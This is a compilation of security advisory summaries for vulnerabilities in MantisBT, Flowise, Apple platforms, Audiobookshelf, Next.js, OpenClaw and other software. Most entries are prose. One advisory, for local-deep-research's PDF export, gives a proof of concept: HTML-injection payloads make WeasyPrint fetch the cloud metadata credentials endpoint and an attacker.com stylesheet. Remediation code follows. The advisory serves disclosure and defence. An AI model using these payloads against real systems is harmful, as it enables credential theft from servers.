HTTP response header injection in WSO2 Webhook API invocations allows unauthenticated remote attackers to inject or overwrite arbitrary HTTP response headers via unsanitized user-supplied input. Successful exploitation enables cache manipulation, security header alteration, cookie injection, and potential session hijacking. CVSS 5.3 (network-accessible, low complexity, no authentication required); no public exploit code or active exploitation confirmed at time of analysis.
MantisBT allows a bugnote author to access the note's Revisions page after losing access to the parent private issue. ### Impact Disclosure of the private Issue's Id and Summary. The bugnote full revision body remains secure. ### Patches - 71df1f67e05b2050cd4bd87839e6cc13747cf03f ### Workarounds None ### Credits Thanks to Vishal Shukla for discovering and responsibly reporting the issue.
The mc_issue_update() function in MantisBT allows users having *update_bug_threshold* access (UPDATER, with default settings) to edit, change view state, and modify time tracking on bugnotes belonging to other users - bypassing the default DEVELOPER (level 55) threshold required by the dedicated mc_issue_note_update() function. ### Impact 1. UPDATER can edit notes by DEVELOPER/MANAGER/ADMIN - bypassing the DEVELOPER threshold 2. UPDATER can change private notes to public - exposing confidential internal discussion 3. UPDATER can change public notes to private - hiding information from reporters/viewers ### Patches - 6e58fae4f22efdc3987f903c8ba2611de17a9435 ### Workarounds None ### Credits Thanks to the following security researchers for independently discovering and responsibly reporting the issue. - Vishal Shukla - Tristan Madani (@TristanInSec) from Talence Security This advisory's contents was largely copied from Tristan's well-written report.
Flowise versions prior to 3.1.0 allow authenticated remote attackers to bypass SSRF protections by exploiting direct HTTP client imports in four tool implementations (OpenAPIToolkit, WebScraperTool, MCP, and Arxiv) that circumvent the centralized httpSecurity.ts validation wrapper. An attacker with tool access can craft requests to reach blocked internal endpoints such as AWS metadata services, restoring full SSRF capability despite administrative deny-list configuration.
MantisBT permits a user to list and download their own attachments from an Issue created by another user, even after that Issue becomes private and direct access to it is denied. ### Impact The loss of confidentiality caused by this vulnerability is minimal, considering that only the attachments that were previously uploaded by the user themselves remains accessible. ### Patches - de7bdeec36de066235e38a77bf056917d951c84d ### Workarounds None. ### Credits Thanks to Vishal Shukla for discovering and responsibly reporting the issue.
Using a crafted POST request to bug_monitor_add.php, a user with project-level access can add themselves as a monitor for a private issue they do not have access to. Despite displaying an Access Denied error, the application accepts the request and creates a monitor relationship for the private issue. ### Impact Direct access to the private issue remains blocked, but the user will receive email notifications for updates, leading to disclosure of the private issue's metadata and content. ### Patches - 0a93267deba445fb9d15250c16e6fdb1246ffa65 ### Workarounds None ### Credits Thanks to Vishal Shukla for discovering and responsibly reporting the issue.
MantisBT 2.28.0-2.28.1 allows authenticated users with add_profile_threshold permission to create global profiles by tampering with the user_id parameter, bypassing the manage_global_profile_threshold authorization check. An attacker with low-privileged authentication can escalate their profile creation capabilities to global scope via direct parameter manipulation in the profile creation request.
Zephyr RTOS sockets created with IPPROTO_TLS_1_3 can negotiate TLS 1.2 connections when both TLS versions are enabled in Kconfig, because socket-level protocol selection is not propagated to mbedTLS's minimum version enforcement. Applications explicitly requesting TLS 1.3 may silently fall back to TLS 1.2, exposing them to known TLS 1.2 weaknesses such as POODLE or truncation attacks. Remote unauthenticated attackers can exploit this via network-level protocol downgrade during the TLS handshake.
A use-after-free vulnerability in Apple's Wi-Fi stack allows attackers in a privileged network position to cause denial-of-service via crafted Wi-Fi packets. The vulnerability affects iOS and iPadOS versions prior to 26.5 and 18.7.9, macOS versions prior to 26.5, 15.7.7, and 14.8.7, and tvOS, watchOS versions prior to 26.5. Exploitation requires adjacent network access and specific radio conditions (AC:H) but results in high availability impact with no active public exploitation identified.
The check user account lock states feature within the email OTP flow fails to validate user input, allowing an attacker to infer the existence of registered user accounts. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity.
Amazon::Credentials for Perl versions through 1.2.0 uses the predictable built-in rand() function to generate 64-bit encryption keys for credential obfuscation, allowing attackers to recover stored credentials through key prediction rather than cryptographic attack. Affects Perl applications that depend on this library to protect AWS credentials and similar secrets in memory or serialized objects. No authentication required; exploitation requires access to the encrypted credential object and knowledge of the rand() seed.
OS command injection in D-Link DNS-320 firmware 2.06B01 allows remote authenticated administrators to execute arbitrary system commands via unsanitized input to multiple CGI functions (cgi_set_host, cgi_set_ntp, cgi_fan_control, cgi_merge_user) in /cgi-bin/system_mgr.cgi. CVSS 5.1 reflects high-privileged access requirement (PR:H) mitigating network-accessible attack vector; however, the ability to inject OS commands via CGI endpoints creates significant risk in multi-user or compromised-admin scenarios. No public exploit code or active exploitation confirmed at time of analysis.
Reflected XSS in ATutor's /install/install.php endpoint allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by crafting a malicious URL. Version 2.2.4 is confirmed vulnerable; the product is no longer actively maintained and vendor response to disclosure was unsuccessful, leaving no official patch available.
Reflected XSS in ATutor's /install/upgrade.php endpoint allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser via a specially crafted URL. The vulnerability affects at least version 2.2.4 and potentially other versions; the product is no longer actively maintained and vendors did not respond with details about the full vulnerable version range. While CVSS 5.1 indicates low severity, the attack requires user interaction (clicking a malicious link) and has limited scope impact.
Stored cross-site scripting (XSS) in Sonatype Nexus Repository 3.6.0 through 3.91.x allows authenticated users with upload permissions to inject malicious JavaScript into repository content, which executes in the browsers of any user viewing the affected repository directory via the HTML index page. An attacker can perform unauthorized actions within a victim's session context, including potential data theft or privilege escalation depending on the victim's role. The vulnerability requires user interaction (clicking/viewing the malicious content) and prior repository upload access, limiting but not eliminating real-world risk in multi-tenant or open-source repository environments.
Reflected cross-site scripting (XSS) in Cradle eCommerce platform allows unauthenticated remote attackers to execute arbitrary JavaScript in users' browsers via crafted input to the /product/ endpoint. The vulnerability requires user interaction (clicking a malicious link) and affects the latest demo version. A vendor patch is available.
Reflected XSS in Cradle eCommerce platform allows unauthenticated remote attackers to execute arbitrary JavaScript in user browsers via unsanitized input reflected in the /collection/ endpoint. The vulnerability requires user interaction (clicking a malicious link) but affects the latest demo version with CVSS 5.1 (low-medium severity). No public exploit code or active exploitation has been identified at time of analysis, though a vendor patch is available.
An authenticated administrator who configures or tests LDAP connectivity in Sonatype Nexus Repository Manager versions 3.0.0 through 3.91.1 may be able to initiate unintended server-side connections when interacting with a malicious LDAP server.
OATHAuth before versions 1.43.7, 1.44.4, or 1.45.2 exposes sensitive information to unauthorized actors through an information disclosure vulnerability accessible to authenticated users via network requests. The vulnerability requires user interaction and results in limited confidentiality impact, affecting deployments where OATHAuth handles two-factor authentication across Wikimedia platforms.
Insufficient access control checks in _ProjectUsersAddCommand_ (used in *manage_proj_user_add.php* and REST API endpoint `PUT /project/{id}/users`) allows users having *manage_project_threshold* access level (*manager* by default) to grant project-level *administrator* access to any user (including themselves) in any Project they have *manager* rights in. The normal project-user add form does restrict the selectable access levels to the actor's own project role or below. However, the backend handler still accepts a forged higher access_level value and writes it. ### Impact Privilege escalation. The consequences of the privilege escalation are not as bad as it may sound, because having *administrator* access at Project level is effectively not very different from being *manager*, it does not actually give administrator privileges on the whole MantisBT instance. In particular, it does not let the upgraded user delete the Project or grant them any access to global administrative functions such as managing Users, Projects, Plugins, Custom Fields, etc. ### Patches - 69e0180f180ed5acf48a8d281a73683a7bf32461 ### Workarounds None ### Credits Thanks to the following security researchers for independently discovering and responsibly reporting the issue: - [Dracosec Research Limited](https://dracosec.tech/) (Siu Nam Tang, Chris Chan, Krecendo Hui, William Lam) - Vishal Shukla
Pre-NVD disclosure via oss-security: oss-security mailing list - 2026/05/11. (GitHub) File archive & mirrors How to verify digital signatures OVE IDs What's new Follow @Openwall on Twitter for new release announcements and other news [<prev day] [month] [year] [list] oss-security mailing list - 2026/05/11 malcontent: Disk Space Exhaustion via Globally Accessible D-Bus API (CVE-2026-44931) (Matthias Gerstner <mgerstner@...e.de>) 1 message Powered by blists - more mailing lists Please check out the Open Source Software Security Wiki , which is counterpart to this mailing list . Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guide
## Summary `PDFService._markdown_to_html()` constructs an HTML document by interpolating user-controlled values - specifically `title` (sourced from `research.title` or `research.query`) and `metadata` key-value pairs - directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in `ssrf_validator.py`. --- ## Details **Vulnerable code:** `src/local_deep_research/web/services/pdf_service.py`, lines 171-176 ```python # pdf_service.py:171-176 if title: html_parts.append(f"<title>{title}</title>") # ← title is not escaped if metadata: for key, value in metadata.items(): html_parts.append(f'<meta name="{key}" content="{value}">') # ← key/value are not escaped ``` **Data flow trace:** ``` User input: research.query │ ▼ research_routes.py:1321 pdf_title = research.title or research.query │ ▼ research_routes.py:1325-1326 export_report_to_memory(report_content, format, title=pdf_title) │ ▼ pdf_service.py:107 PDFService.markdown_to_pdf(markdown_content, title=pdf_title) │ ▼ pdf_service.py:137 _markdown_to_html(markdown_content, title, metadata) │ ▼ pdf_service.py:172 f"<title>{title}</title>" ← injection point, no escaping │ ▼ pdf_service.py:112 HTML(string=html_content) ← WeasyPrint renders the injected HTML ``` `research.query` is a string submitted by the user via `POST /api/start_research`, stored as-is in the database, and retrieved without any sanitization. When the user triggers `POST /api/v1/research/<research_id>/export/pdf`, this value is embedded unescaped into the HTML document processed by WeasyPrint. **Injection point 1: `<title>` tag breakout** ``` Input: </title><img src="http://169.254.169.254/latest/meta-data/" /> Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title> ``` When WeasyPrint encounters the injected `<img>` tag, it issues an HTTP GET request to the value of `src` by default. **Injection point 2: `<meta>` attribute breakout** ``` Input: " /><link rel="stylesheet" href="http://attacker.com/evil.css Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css"> ``` WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF. --- ## Proof of Concept **Step 1: Log in and submit a research query containing the injection payload** ```http POST /api/start_research HTTP/1.1 Host: localhost:5000 Content-Type: application/json Cookie: session=<valid_session> { "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>", "mode": "quick", "model_provider": "OLLAMA", "model": "llama3" } ``` The response returns a `research_id`, e.g. `"aaaa-bbbb-cccc-dddd"`. **Step 2: After the research completes, trigger PDF export** ```http POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1 Host: localhost:5000 Cookie: session=<valid_session> X-CSRFToken: <csrf_token> ``` **Step 3: Intermediate HTML constructed server-side** ```html <!DOCTYPE html><html><head> <meta charset="utf-8"> <title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title> </head><body> ...report content... </body></html> ``` **Step 4: WeasyPrint issues an outbound HTTP request to the injected URL** Observed in network monitoring (e.g. `tcpdump`) or the target internal service logs: ``` GET /latest/meta-data/iam/security-credentials/ HTTP/1.1 Host: 169.254.169.254 User-Agent: WeasyPrint/... ``` **Lightweight verification (no SSRF environment required):** Set the query to: ``` </title><title>INJECTED ``` The resulting HTML will contain two `<title>` tags and the PDF document metadata title will read `INJECTED`, confirming successful injection. --- ## Impact ### 1. Chained SSRF (High Severity) By injecting `<img src>`, `<link href>`, or `<style>@import url()` tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to: - **Cloud metadata services** (`169.254.169.254`) on AWS, GCP, or Azure - enabling theft of IAM credentials and instance identity documents. - **Internal network services** (`192.168.x.x`, `10.x.x.x`) - enabling reconnaissance and interaction with internal APIs not exposed to the internet. - **Localhost administrative interfaces** - if SSRF protections are only applied at the user-input validation layer. This is an effective bypass of the application's existing SSRF defenses in `ssrf_validator.py`, because WeasyPrint's outbound resource requests are never routed through that validator. ### 2. HTML Document Structure Corruption Injected tags can prematurely close `<head>` and insert arbitrary content into `<body>`, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality. ### 3. CSS Injection (Medium Severity) By injecting `<link>` or `<style>` tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing. ### 4. Affected Scope - All PDF export operations are affected. - The vulnerability is reachable by any authenticated user - no elevated privileges required. - Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability. --- ## Remediation Apply `html.escape()` to all user-controlled values before embedding them in the HTML template inside `_markdown_to_html`: ```python import html if title: html_parts.append(f"<title>{html.escape(title)}</title>") if metadata: for key, value in metadata.items(): html_parts.append( f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">' ) ``` Additionally, consider configuring WeasyPrint with a custom `url_fetcher` that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources: ```python def safe_url_fetcher(url, timeout=10): from ssrf_validator import validate_url if not validate_url(url): raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}") return weasyprint.default_url_fetcher(url, timeout=timeout) html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher) ``` --- *Report generated against commit `f3540fb3` - local-deep-research, branch `main`.* --- ## Maintainer note (2026-04-24) Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to `main`: **#3082** (merged 2026-03-29, shipped in **v1.5.0+**) - closes the HTML-injection sinks: - `html.escape()` now wraps the `title` value in `<title>…</title>` - Same for metadata keys/values in `<meta name="…" content="…">` - Regression tests added in `tests/web/services/test_pdf_service.py` **#3613** (merged 2026-04-24, shipped in **v1.6.0**) - implements the `url_fetcher` recommendation from the Remediation section: - New `_safe_url_fetcher` in `pdf_service.py` delegates to `weasyprint.default_url_fetcher` only after `security.ssrf_validator.validate_url` accepts the URL - Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes - Covers the chained SSRF path through any URL reaching the rendered HTML - markdown body, citations, raw-HTML passthrough via Python-Markdown - Blocked URLs raise `UnsafePDFResourceURLError` (a `ValueError` subclass) so WeasyPrint skips the resource and the render continues - 8 regression tests, including an end-to-end render with `<img src="http://169.254.169.254/…">` embedded in the body **Advisory metadata:** CVSS `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N` (5.0 Moderate), CWEs **CWE-79** + **CWE-918**. **Patched in v1.6.0** - upgrade to v1.6.0 or later to receive both fixes.
GuardDog versions 2.6.0 through 2.9.0 fail to escape terminal control characters in human-readable scan output, allowing malicious packages to inject ANSI or OSC escape sequences that can clear analyst terminals, rewrite CI logs, or inject spoofed content. The vulnerability affects file paths, code snippets, and messages parsed from package content and rendered directly to stdout without sanitization. Remote attackers can exploit this by distributing packages with specially crafted filenames or source code containing escape sequences, and requires only user interaction (running the scanner on the malicious package).
Denial-of-service in Audiobookshelf prior to version 2.32.2 allows authenticated admin users to crash the server by uploading a specially crafted ZIP file to the backup upload endpoint. The vulnerability stems from decompressing ZIP entries without size limits, enabling an attacker to craft a highly compressed archive that consumes gigabytes of memory when extracted, exhausting server resources and triggering an out-of-memory condition.
Denial-of-service vulnerability in iOS and iPadOS allows network-positioned attackers with high privileges to crash or degrade service availability through insufficient input validation. Apple addressed this with patches in iOS 18.7.7, iPadOS 18.7.7, iOS 26.4, and iPadOS 26.4. EPSS score of 0.02% (5th percentile) indicates very low real-world exploitation probability despite CVSS score of 4.9.
Wikimedia Foundation CheckUser versions 1.45.0 through 1.45.1 expose sensitive information to unauthorized actors through a flaw in access control, allowing high-privileged users with user interaction to view data they should not access. The vulnerability affects the CheckUser extension used across Wikimedia projects and is confirmed patched in version 1.45.2. EPSS and active exploitation status are not publicly documented, but the low CVSS score (4.8) and requirement for elevated privileges limit real-world impact.
Stored cross-site scripting (XSS) in pgAdmin 4 before version 9.15 allows authenticated administrators to execute arbitrary JavaScript in the browsers of other pgAdmin users by crafting malicious PostgreSQL object names (databases, schemas, tables, columns) that are rendered unsafely via innerHTML in the Browser Tree and Explain Visualizer modules. The vulnerability requires administrator privileges and user interaction (navigation to or EXPLAIN execution over the malicious object), limiting real-world exploitation scope despite the network attack vector.
Cross-site scripting via CSP nonce poisoning in Next.js App Router allows attackers to inject malicious scripts into cached HTML responses when applications process untrusted CSP request headers. Versions 13.4.0-15.5.15 and 16.0.0-16.2.4 are vulnerable; attackers can craft malformed nonce values that escape sanitization and execute arbitrary JavaScript for subsequent cache visitors. No public exploit code identified at time of analysis, but the attack requires no authentication and low user interaction (cache hit by victim), making it practically exploitable in shared hosting and CDN scenarios.
Zen Browser prior to version 1.19.12b incorrectly truncates long hostnames in the address bar, displaying only the attacker-controlled subdomain prefix while hiding the actual registrable domain (eTLD+1). This allows attackers to craft malicious URLs with extremely long subdomains that visually impersonate trusted brands, directly compromising the URL bar as a security indicator and enabling phishing and supply-chain attacks. The vulnerability requires user interaction (clicking a malicious link) but affects all users on vulnerable versions. No public exploit code or active exploitation has been identified at this time.
A race condition in Apple operating systems allows authenticated local attackers to access sensitive user data with high complexity exploitation. The vulnerability affects iOS 18.7.9 and earlier, iPadOS 18.7.9 and earlier, iOS 26.5 and earlier, iPadOS 26.5 and earlier, macOS Sequoia 15.7.7 and earlier, macOS Sonoma 14.8.7 and earlier, macOS Tahoe 26.5 and earlier, and visionOS 26.5 and earlier. Vendor-released patches are available, and exploitation requires local access with user-level privileges and high technical complexity. The EPSS score of 0.02% and absence from active exploitation databases indicate low real-world exploitation risk despite the high confidentiality impact.
Memory corruption in Apple operating systems due to a race condition in locking mechanisms allows local authenticated attackers to cause unexpected app termination or potential denial of service. The vulnerability affects iOS 18.7.8 and earlier, iPadOS 18.7.8 and earlier, macOS Sequoia 15.7.6 and earlier, macOS Sonoma 14.8.6 and earlier, macOS Tahoe 26.4 and earlier, tvOS 26.4 and earlier, visionOS 26.4 and earlier, and watchOS 26.4 and earlier. Vendor-released patches are available across all affected platforms, with no public exploit identified at time of analysis.
A race condition was addressed with additional validation. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data.
Stored cross-site scripting (XSS) via CSS injection in Open edX Platform allows enrolled students to inject arbitrary CSS into discussion notification emails sent to other users by bypassing insufficient HTML sanitization in the clean_thread_html_body() function. The vulnerability affects all versions prior to the fix commit and enables email tracking through malicious stylesheets, content spoofing, and phishing attacks against recipients who view notification emails.
Physical access to a locked macOS Tahoe device prior to version 26.5 allows an attacker to view sensitive user information without authentication. The vulnerability has a low EPSS score (0.02%, 6th percentile) and CISA assesses it as non-exploitable in the wild (SSVC exploitation: none), indicating this is a low-probability real-world threat despite the confidentiality impact rating. The fix is available in macOS Tahoe 26.5.
A privacy issue was addressed by removing the vulnerable code. This issue is fixed in iOS 26.5 and iPadOS 26.5. An attacker with physical access may be able to use Visual Intelligence to access sensitive user data during iPhone Mirroring.
Stored cross-site scripting (XSS) in Audiobookshelf prior to 2.33.0 allows authenticated administrators to inject malicious HTML and JavaScript into the authLoginCustomMessage field via the /api/auth-settings endpoint, which is then rendered on the login page for all users without sanitization. This enables attackers with admin credentials to capture user credentials, perform account takeover, or redirect users to phishing sites. No public exploit code identified at time of analysis.
jq versions 1.8.1 and earlier allow local authenticated users to bypass import path validation through NUL byte injection, enabling access to unintended files and potential information disclosure. An attacker with local access can craft a jq script containing embedded NUL bytes in import paths that pass policy validation checks but resolve to arbitrary files on disk via C string operations, circumventing intended access controls.
Authenticated users with upload permission in Audiobookshelf prior to 2.32.2 can enumerate files outside their authorized library folder through a path traversal vulnerability in the POST /api/filesystem/pathexists endpoint. The vulnerability exploits a weak String.startsWith() validation that fails to distinguish between sibling directories with shared prefixes (e.g., /audiobooks and /audiobooks-private), allowing information disclosure about file existence across library boundaries despite authentication requirements. No public exploit code or active exploitation has been identified at time of analysis.
The issue was addressed with improved input validation. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected process crash.
Audiobookshelf prior to version 2.32.2 fails to enforce library access controls on the GET /api/collections and GET /api/collections/:id endpoints, allowing authenticated users to enumerate and retrieve collection metadata and book information from libraries they are not authorized to access. An attacker with valid credentials to any library can exploit this privilege escalation to discover sensitive metadata across all libraries in a multi-library installation.
### Impact MantisBT allows an authenticated user to upload attachments to private Issues they are not authorized to access. ### Patches - b262b4d2835b81394d75356dead66e52a6275206 ### Workarounds None. ### Credits Thanks to Vishal Shukla for discovering and responsibly reporting the issue.
The issue was addressed with improved memory handling. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing an audio stream in a maliciously crafted media file may terminate the process.
The issue was addressed with improved memory handling. This issue is fixed in iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected process crash.
The issue was addressed with improved UI handling. This issue is fixed in iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, visionOS 26.5. A malicious iframe may use another website’s download settings.
OpenClaw before 2026.4.22 allows workspace dotenv files to override connector endpoint hosts for Matrix, Mattermost, IRC, and Synology connectors, enabling local attackers with workspace access to redirect runtime traffic to malicious endpoints. The vulnerability requires local access and user interaction but allows high confidentiality impact through traffic interception. No active exploitation has been identified, but a vendor-released patch is available.
OpenClaw versions 2026.4.5 through 2026.4.19 allow local attackers with user privileges to redirect credentialed MiniMax API requests to attacker-controlled servers via environment variable injection in workspace dotenv files, exposing MiniMax API keys in Authorization headers. The vulnerability requires user interaction (opening a malicious workspace) and local access but achieves high confidentiality impact by exfiltrating sensitive API credentials.
Improper escaping of the redirection page (retrieved from the request's *Referer* header) allows an attacker to inject HTML. While this is generally not directly actionable as modern browsers will URL-encode special characters, on some specific server configurations this could poison the cache, leading to cross-site scripting. ### Impact Cross-site scripting (XSS). ### Patches - b1ebc57763f104eb5f541b7b4d1ce6948168abd9 ### Workarounds None ### Credits Thanks to siunam (Tang Cheuk Hei) for discovering and responsibly reporting the issue.